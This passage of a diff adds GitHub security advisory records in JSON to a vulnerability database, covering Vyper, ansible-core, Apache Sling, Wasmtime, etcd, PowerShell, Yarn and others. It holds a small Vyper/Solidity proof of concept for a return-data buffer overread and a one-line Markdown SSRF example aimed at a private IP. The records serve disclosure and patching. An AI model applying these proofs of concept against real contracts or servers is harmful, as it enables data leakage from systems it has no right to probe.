than the actual `RETURNDATASIZE`, the return data read from the buffer will overrun the actual return data size and read from the input buffer.\n\n## Proof of Concept\n\nThis contract calls an external contract with two arguments. As the call is made, the buffer includes:\n- byte 28: method_id\n- byte 32: first argument (0)\n- byte 64: second argument (hash)\n\nThe return data buffer begins at byte 0, and will return the returned bytestring, up to a maximum length of 96 bytes.\n\n```python\ninterface Zero:\n def sneaky(a: uint256, b: bytes32) -> Bytes[96]: view\n\n@external\ndef test_sneaky(z: address) -> Bytes[96]:\n return Zero(z).sneaky(0, keccak256(\"oops\"))\n```\nOn the other side, imagine a simple contract that does not, in fact, return a bytestring, but instead returns two uint256s. I've implemented it in Solidity for ease of use with Foundry:\n```solidity\nfunction sneaky(uint a, bytes32 b) external pure returns (uint, uint) {\n return (32, 32);\n}\n```\n\nThe return data will be parsed as a bytestring. The first 32 will point us to byte 32 to read the length. The second 32 will be perceived as the length. It will then read the next 32 bytes from the return data buffer, even though those weren't a part of the return data.\n\nSince these bytes will come from byte 64, we can see above that the hash was placed there in the input buffer.\n\nIf we run the following Foundry test, we can see that this does in fact happen:\n```solidity\nfunction test__sneakyZeroReturn() public {\n ZeroReturn z = new ZeroReturn();\n c = SuperContract(deployer.deploy(\"src/loose/\", \"ret_overflow\", \"\"));\n console.logBytes(c.test_sneaky(address(z)));\n}\n```\n\n```md\nLogs:\n 0xd54c03ccbc84dd6002c98c6df5a828e42272fc54b512ca20694392ca89c4d2c6\n```\n\n## Impact\n\nMalicious or mistaken contracts returning the malformed data can result in overrunning the returned data and reading return data from the input buffer.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "vyper" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "0.3.10" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/vyperlang/vyper/security/advisories/GHSA-gp3w-2v2m-p686" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24560" + }, + { + "type": "PACKAGE", + "url": "https://github.com/vyperlang/vyper" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2024-02-02T18:10:10Z", + "nvd_published_at": "2024-02-02T17:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-h24r-m9qc-pvpg/GHSA-h24r-m9qc-pvpg.json b/advisories/github-reviewed/2024/02/GHSA-h24r-m9qc-pvpg/GHSA-h24r-m9qc-pvpg.json new file mode 100644 index 0000000000000..78186b0fec1b0 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-h24r-m9qc-pvpg/GHSA-h24r-m9qc-pvpg.json @@ -0,0 +1,127 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h24r-m9qc-pvpg", + "modified": "2024-02-08T00:32:19Z", + "published": "2024-02-06T12:30:31Z", + "aliases": [ + "CVE-2024-0690" + ], + "summary": "Ansible-core information disclosure flaw", + "details": "An information disclosure flaw was found in ansible-core due to a failure to respect the `ANSIBLE_NO_LOG` configuration in some scenarios. It was discovered that information is still included in the output in certain tasks, such as loop items. Depending on the task, this issue may include sensitive information, such as decrypted secret values.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "ansible-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.16.0b1" + }, + { + "fixed": "2.16.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "PyPI", + "name": "ansible-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.15.0b1" + }, + { + "fixed": "2.15.9" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "PyPI", + "name": "ansible-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.14.14" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0690" + }, + { + "type": "WEB", + "url": "https://github.com/ansible/ansible/pull/82565" + }, + { + "type": "WEB", + "url": "https://github.com/ansible/ansible/commit/6935c8e303440addd3871ecf8e04bde61080b032" + }, + { + "type": "WEB", + "url": "https://github.com/ansible/ansible/commit/78db3a3de6b40fb52d216685ae7cb903c609c3e1" + }, + { + "type": "WEB", + "url": "https://github.com/ansible/ansible/commit/b9a03bbf5a63459468baf8895ff74a62e9be4532" + }, + { + "type": "WEB", + "url": "https://github.com/ansible/ansible/commit/beb04bc2642c208447c5a936f94310528a1946b1" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0733" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2024-0690" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2259013" + }, + { + "type": "PACKAGE", + "url": "https://github.com/ansible/ansible" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-117" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-06T20:26:17Z", + "nvd_published_at": "2024-02-06T12:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-h2rq-qhr7-53gm/GHSA-h2rq-qhr7-53gm.json b/advisories/github-reviewed/2024/02/GHSA-h2rq-qhr7-53gm/GHSA-h2rq-qhr7-53gm.json new file mode 100644 index 0000000000000..95f40fdcde102 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-h2rq-qhr7-53gm/GHSA-h2rq-qhr7-53gm.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h2rq-qhr7-53gm", + "modified": "2024-02-06T18:24:31Z", + "published": "2024-02-06T12:30:30Z", + "aliases": [ + "CVE-2024-23673" + ], + "summary": "Apache Sling Servlets Resolver executes malicious code via path traversal", + "details": "\nMalicious code execution via path traversal in Apache Software Foundation Apache Sling Servlets Resolver.This issue affects all version of Apache Sling Servlets Resolver before 2.11.0. However, whether a system is vulnerable to this attack depends on the exact configuration of the system.\nIf the system is vulnerable, a user with write access to the repository might be able to trick the Sling Servlet Resolver to load a previously uploaded script. \n\nUsers are recommended to upgrade to version 2.11.0, which fixes this issue. It is recommended to upgrade, regardless of whether your system configuration currently allows this attack or not.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.apache.sling:org.apache.sling.servlets.resolver" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.11.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23673" + }, + { + "type": "WEB", + "url": "https://github.com/apache/sling-org-apache-sling-servlets-resolver/commit/b54d4e6693e0bcd63a97a0328f4f065b8a81b75e" + }, + { + "type": "PACKAGE", + "url": "https://github.com/apache/sling-org-apache-sling-servlets-resolver" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread/5zzx8ztwc6tmbwlw80m2pbrp3913l2kl" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/02/06/1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-06T18:24:31Z", + "nvd_published_at": "2024-02-06T10:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-h4c3-5275-vrmg/GHSA-h4c3-5275-vrmg.json b/advisories/github-reviewed/2024/02/GHSA-h4c3-5275-vrmg/GHSA-h4c3-5275-vrmg.json new file mode 100644 index 0000000000000..06bf986e1bf40 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-h4c3-5275-vrmg/GHSA-h4c3-5275-vrmg.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h4c3-5275-vrmg", + "modified": "2024-02-03T00:29:02Z", + "published": "2024-02-03T00:29:02Z", + "aliases": [ + + ], + "summary": "Nervos CKB Pool does not remove the conflicting transactions from the statistics ", + "details": "### Impact\n\nThere's a bug in the pool statistics that when conflicting transactions are removed from the pool, they are not subtracted from the statics. Finally, the transaction pool keeps full and reject all transactions.\n\n### Patches\n\n0.39.2\n\n### Workarounds\n\nRestart the CKB node.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "crates.io", + "name": "ckb" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.39.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/nervosnetwork/ckb/security/advisories/GHSA-h4c3-5275-vrmg" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-03T00:29:02Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-h84q-m8rr-3v9q/GHSA-h84q-m8rr-3v9q.json b/advisories/github-reviewed/2024/02/GHSA-h84q-m8rr-3v9q/GHSA-h84q-m8rr-3v9q.json new file mode 100644 index 0000000000000..4ac9dbf1de639 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-h84q-m8rr-3v9q/GHSA-h84q-m8rr-3v9q.json @@ -0,0 +1,92 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h84q-m8rr-3v9q", + "modified": "2024-02-01T00:15:47Z", + "published": "2024-02-01T00:15:47Z", + "aliases": [ + "CVE-2022-39394" + ], + "summary": "wasmtime_trap_code C API function has out of bounds write vulnerability", + "details": "### Impact\n\nThere is a bug in Wasmtime's C API implementation where the definition of the `wasmtime_trap_code` does not match its declared signature in the `wasmtime/trap.h` header file. This discrepancy causes the function implementation to perform a 4-byte write into a 1-byte buffer provided by the caller. This can lead to three zero bytes being written beyond the 1-byte location provided by the caller.\n\n### Patches\n\nThis bug has been patched and users should upgrade to Wasmtime 2.0.2.\n\n### Workarounds\n\nThis can be worked around by providing a 4-byte buffer casted to a 1-byte buffer when calling `wasmtime_trap_code`. Users of the `wasmtime` crate are not affected by this issue, only users of the C API function `wasmtime_trap_code` are affected.\n\n### References\n\n* [Definition of `wasmtime_trap_code`](https://docs.wasmtime.dev/c-api/trap_8h.html#a6580f4f209d3eaebb6e8b9a901a30b7a)\n* [Mailing list announcement](https://groups.google.com/a/bytecodealliance.org/g/sec-announce/c/c1HBDDJwNPA)\n* [Patch to fix for `main` branch](https://github.com/bytecodealliance/wasmtime/commit/5b6d5e78de106503b3b9add218bb3d2b1d63c493)\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n\n* Reach out to us on [the Bytecode Alliance Zulip chat](https://bytecodealliance.zulipchat.com/#narrow/stream/217126-wasmtime)\n* Open an issue in [the bytecodealliance/wasmtime repository](https://github.com/bytecodealliance/wasmtime/)\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "crates.io", + "name": "wasmtime" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.0.0" + }, + { + "fixed": "2.0.2" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "crates.io", + "name": "wasmtime" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.0.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/bytecodealliance/wasmtime/security/advisories/GHSA-h84q-m8rr-3v9q" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-39394" + }, + { + "type": "WEB", + "url": "https://github.com/bytecodealliance/wasmtime/commit/087d9d7becf7422b3f872a3bcd5d97bb7ce7ff36" + }, + { + "type": "WEB", + "url": "https://github.com/bytecodealliance/wasmtime/commit/5b6d5e78de106503b3b9add218bb3d2b1d63c493" + }, + { + "type": "PACKAGE", + "url": "https://github.com/bytecodealliance/wasmtime" + }, + { + "type": "WEB", + "url": "https://groups.google.com/a/bytecodealliance.org/g/sec-announce/c/c1HBDDJwNPA" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-787" + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T00:15:47Z", + "nvd_published_at": "2022-11-10T20:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-hjqq-29pw-96wj/GHSA-hjqq-29pw-96wj.json b/advisories/github-reviewed/2024/02/GHSA-hjqq-29pw-96wj/GHSA-hjqq-29pw-96wj.json new file mode 100644 index 0000000000000..38cd3db82d69b --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-hjqq-29pw-96wj/GHSA-hjqq-29pw-96wj.json @@ -0,0 +1,77 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hjqq-29pw-96wj", + "modified": "2024-02-02T22:23:11Z", + "published": "2024-02-02T22:23:11Z", + "aliases": [ + + ], + "summary": "Nervos CKB node panics when processing a block which parent timestamp is too new", + "details": "### Impact\n\nAdversary can initiate DOS attack by broadcasting two consecutive blocks with timestamps in the future. \n\n### Patches\n\nPlease upgrade to v0.34.1", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "crates.io", + "name": "ckb" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.33.0" + }, + { + "fixed": "0.33.2" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "crates.io", + "name": "ckb" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.34.0" + }, + { + "fixed": "0.34.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/nervosnetwork/ckb/security/advisories/GHSA-hjqq-29pw-96wj" + }, + { + "type": "WEB", + "url": "https://github.com/nervosnetwork/ckb/commit/ae3c791068f2f76c67cd5483501f09de3fd8cc0b" + }, + { + "type": "WEB", + "url": "https://github.com/nervosnetwork/ckb/commit/c6725bb0659b6639f384d699f815117d76107388" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-02T22:23:11Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-hvp4-vrv2-8wrq/GHSA-hvp4-vrv2-8wrq.json b/advisories/github-reviewed/2024/02/GHSA-hvp4-vrv2-8wrq/GHSA-hvp4-vrv2-8wrq.json new file mode 100644 index 0000000000000..310043ca3c79c --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-hvp4-vrv2-8wrq/GHSA-hvp4-vrv2-8wrq.json @@ -0,0 +1,68 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hvp4-vrv2-8wrq", + "modified": "2024-02-08T18:32:10Z", + "published": "2024-02-08T18:32:10Z", + "aliases": [ + "CVE-2024-1314" + ], + "summary": "Kinto Attachment's attachments can be replaced on read-only records", + "details": "### Impact\n\nThe attachment file of an existing record can be replaced if the user has `\"read\"` permission on one of the parent (collection or bucket).\n\nAnd if the `\"read\"` permission is given to `\"system.Everyone\"` on one of the parent, then the attachment can be replaced on a record using an anonymous request.\n\nNote that if the parent has no explicit read permission, then the records attachments are safe.\n\n### Patches\n\n- Patch released in kinto-attachment 6.4.0\n- https://github.com/Kinto/kinto-attachment/commit/f4a31484f5925cbc02b59ebd37554538ab826ca1\n\n### Workarounds\n\nNone if the read permission has to remain granted.\n\nUpdating to 6.4.0 or applying the patch individually (if updating is not feasible) is strongly recommended.\n\n### References\n\n- https://bugzilla.mozilla.org/show_bug.cgi?id=1879034", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "kinto-attachment" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "6.4.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 6.3.2" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/Kinto/kinto-attachment/security/advisories/GHSA-hvp4-vrv2-8wrq" + }, + { + "type": "WEB", + "url": "https://github.com/Kinto/kinto-attachment/commit/f4a31484f5925cbc02b59ebd37554538ab826ca1" + }, + { + "type": "WEB", + "url": "https://bugzilla.mozilla.org/show_bug.cgi?id=1879034" + }, + { + "type": "PACKAGE", + "url": "https://github.com/Kinto/kinto-attachment" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T18:32:10Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-j86v-2vjr-fg8f/GHSA-j86v-2vjr-fg8f.json b/advisories/github-reviewed/2024/02/GHSA-j86v-2vjr-fg8f/GHSA-j86v-2vjr-fg8f.json new file mode 100644 index 0000000000000..9dc863df1b88a --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-j86v-2vjr-fg8f/GHSA-j86v-2vjr-fg8f.json @@ -0,0 +1,72 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j86v-2vjr-fg8f", + "modified": "2024-02-03T00:03:04Z", + "published": "2024-02-03T00:03:04Z", + "aliases": [ + + ], + "summary": "Etcd Gateway TLS endpoint validation only confirms TCP reachability", + "details": "### Vulnerability type\nCryptography\n\n### Workarounds\nRefer to the [gateway documentation](https://github.com/etcd-io/etcd/blob/master/Documentation/op-guide/gateway.md). The vulnerability was spotted due to unclear documentation of how the gateway handles endpoints validation. \n\n### Detail\nSecure endpoint validation is performed by the etcd gateway start command when the --discovery-srv flag is enabled. However, as currently implemented, it only validates TCP reachability, effectively allowing connections to an endpoint that doesn't accept TLS connections through the HTTPS URL. The auditors has noted that appropriate documentation of this validation functionality plus deprecation of this misleading functionality is an acceptable path forward.\n\n### References\nFind out more on this vulnerability in the [security audit report](https://github.com/etcd-io/etcd/blob/master/security/SECURITY_AUDIT.pdf)\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Contact the [etcd security committee](https://github.com/etcd-io/etcd/blob/master/security/security-release-process.md#product-security-committee-psc)", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "go.etcd.io/etcd" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.4.0-rc.0" + }, + { + "fixed": "3.4.10" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.4.9" + } + }, + { + "package": { + "ecosystem": "Go", + "name": "go.etcd.io/etcd" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.3.23" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/etcd-io/etcd/security/advisories/GHSA-j86v-2vjr-fg8f" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-03T00:03:04Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-jcmq-5rrv-j2g4/GHSA-jcmq-5rrv-j2g4.json b/advisories/github-reviewed/2024/02/GHSA-jcmq-5rrv-j2g4/GHSA-jcmq-5rrv-j2g4.json new file mode 100644 index 0000000000000..a374bc1e8d8f8 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-jcmq-5rrv-j2g4/GHSA-jcmq-5rrv-j2g4.json @@ -0,0 +1,53 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jcmq-5rrv-j2g4", + "modified": "2024-02-02T21:04:47Z", + "published": "2024-02-02T21:04:47Z", + "aliases": [ + + ], + "summary": "PowerShell is subject to remote code execution vulnerability", + "details": "# Microsoft Security Advisory CVE-2020-0605: .NET Framework Remote Code Execution Vulnerability\n\n## Executive Summary\n\nA remote code execution vulnerability exists in .NET software when the software fails to check the source markup of a file.\n\nAn attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n\nExploitation of the vulnerability requires that a user open a specially crafted file with an affected version of .NET Framework. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file.\n\nThe security update addresses the vulnerability by correcting how .NET Framework checks the source markup of a file.\n\n## Discussion\n\nPlease [open a support question](https://github.com/PowerShell/PowerShell/issues/new?assignees=&labels=Issue-Question&template=Support_Question.md&title=Support+Question) to discuss the PowerShell aspects of this advisory.\nPlease use https://github.com/dotnet/wpf/issues/2424 for discussion of the .NET WPF aspects of this advisory.\n\n## Affected Software\n\nThe vulnerability affects PowerShell prior to the following versions:\n\n| PowerShell Core Version | Fixed in |\n|-------------------------|-------------------|\n| 6.2 | Not Affected |\n| 7.0 | 7.0.0 |\n## Advisory FAQ\n\n### How do I know if I am affected?\n\nIf all of the following are true:\n\n1. Run `pwsh -v`, then, check the version in the table in [Affected Software](#user-content-affected-software) to see if your version of PowerShell is affected.\n1. If you are running a version of PowerShell where the executable is not `pwsh` or `pwsh.exe`, then you are affected. This only existed for preview version of `7.0`.\n\n### How do I update to an unaffected version?\n\nFollow the instructions at [Installing PowerShell](https://docs.microsoft.com/en-us/powershell/scripting/setup/installing-powershell?view=powershell-7) to install the latest version of PowerShell.\n\n## Other Information\n\n### Reporting Security Issues\n\nIf you have found a potential security issue in PowerShell,\nplease email details to secure@microsoft.com.\n\n### Support\n\nYou can ask questions about this issue on GitHub in the PowerShell organization.\nThis is located at https://github.com/PowerShell/.\nThe Announcements repo (https://github.com/PowerShell/Announcements)\nwill contain this bulletin as an issue and will include a link to a discussion issue where you can ask questions.\n\n### What if the update breaks my script or module?\n\nYou can uninstall the newer version of PowerShell and install the previous version of PowerShell.\nThis should be treated as a temporary measure.\nTherefore, the script or module should be updated to work with the patched version of PowerShell.\n\n### Acknowledgments\n\nSoroush Dalili ([@irsdl](https://twitter.com/irsdl))\n\n### External Links\n\n[CVE-2020-0605](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0605)\n\n### Revisions\n\n\nV1.0 (March 10, 2020): Advisory published.\n\n*Version 1.0*\n*Last Updated 2020-03-10*", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "NuGet", + "name": "PowerShell" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "7.0.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/PowerShell/PowerShell/security/advisories/GHSA-jcmq-5rrv-j2g4" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-02T21:04:47Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-m95h-p4gg-wfw3/GHSA-m95h-p4gg-wfw3.json b/advisories/github-reviewed/2024/02/GHSA-m95h-p4gg-wfw3/GHSA-m95h-p4gg-wfw3.json new file mode 100644 index 0000000000000..42cdcf47a6995 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-m95h-p4gg-wfw3/GHSA-m95h-p4gg-wfw3.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m95h-p4gg-wfw3", + "modified": "2024-02-06T20:28:55Z", + "published": "2024-02-06T15:32:07Z", + "aliases": [ + "CVE-2024-24591" + ], + "summary": "Allegro AI ClearML path traversal vulnerability", + "details": "A path traversal vulnerability in version 1.4.0 or newer of Allegro AI’s ClearML platform enables a maliciously uploaded dataset to write local or remote files to an arbitrary location on an end user’s system when interacted with.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "clearml" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.17.0" + }, + { + "last_affected": "1.14.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24591" + }, + { + "type": "PACKAGE", + "url": "https://github.com/allegroai/clearml" + }, + { + "type": "WEB", + "url": "https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-06T20:28:55Z", + "nvd_published_at": "2024-02-06T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-mf74-qq7w-6j7v/GHSA-mf74-qq7w-6j7v.json b/advisories/github-reviewed/2024/02/GHSA-mf74-qq7w-6j7v/GHSA-mf74-qq7w-6j7v.json new file mode 100644 index 0000000000000..2b487c4c11efb --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-mf74-qq7w-6j7v/GHSA-mf74-qq7w-6j7v.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mf74-qq7w-6j7v", + "modified": "2024-02-03T00:38:22Z", + "published": "2024-02-03T00:38:22Z", + "aliases": [ + + ], + "summary": "Zmarkdown Server-Side Request Forgery (SSRF) in remark-download-images", + "details": "### Impact\n\nA major blind SSRF has been found in `remark-images-download`, which allowed\nfor requests to be made to neighboring servers on local IP ranges.\nThe issue came from a loose filtering of URLs inside the module.\n\nImagine a server running on a private network `192.168.1.0/24`.\nA private service serving images is running on `192.168.1.2`, and\nis not expected to be accessed by users. A machine is running\n`remark-images-download` on the neighboring `192.168.1.3` host.\nAn user enters the following Markdown:\n\n```markdown\n![](http://192.168.1.2/private-img.png)\n```\n\nThe image is downloaded by the server and included inside the resulting\ndocument. Hence, the user has access to the private image.\n\nIt has been corrected by preventing images downloads from\nlocal IP ranges, both in IPv4 and IPv6.\nTo avoid malicious domain names, resolved local IPs from are also\nforbidden inside the module.\nThis vulnerability impact is moderate, as it is can allow access to\nunexposed documents on the local network, and is very easy\nto exploit.\n\n### Patches\n\nThe vulnerability has been patched in version 3.1.0.\nIf impacted, you should update to this version as soon as possible.\n\nPlease note that a minor version has been released instead of a bugfix.\nThis is due to a new option included to prevent another vulnerability,\nupgrading to the new version will not break compatibility.\n\n### Workarounds\n\nNo workaround is known, the package should be upgraded.\n\n### For more information\n\nIf you have any questions or comments about this advisory, open an issue in [ZMarkdown](https://github.com/zestedesavoir/zmarkdown/issues).\n", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "zmarkdown" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.1.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/zestedesavoir/zmarkdown/security/advisories/GHSA-mf74-qq7w-6j7v" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-03T00:38:22Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-mpwj-fcr6-x34c/GHSA-mpwj-fcr6-x34c.json b/advisories/github-reviewed/2024/02/GHSA-mpwj-fcr6-x34c/GHSA-mpwj-fcr6-x34c.json new file mode 100644 index 0000000000000..35a76b8e6be0c --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-mpwj-fcr6-x34c/GHSA-mpwj-fcr6-x34c.json @@ -0,0 +1,73 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mpwj-fcr6-x34c", + "modified": "2024-02-05T20:20:29Z", + "published": "2024-02-04T21:30:43Z", + "aliases": [ + "CVE-2021-4435" + ], + "summary": "Yarn untrusted search path vulnerability", + "details": "An untrusted search path vulnerability was found in Yarn. When a victim runs certain Yarn commands in a directory with attacker-controlled content, malicious commands could be executed in unexpected ways.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "yarn" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.22.13" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-4435" + }, + { + "type": "WEB", + "url": "https://github.com/yarnpkg/yarn/commit/67fcce88935e45092ffa2674c08053f1ef5268a1" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2021-4435" + }, + { + "type": "WEB", + "url": 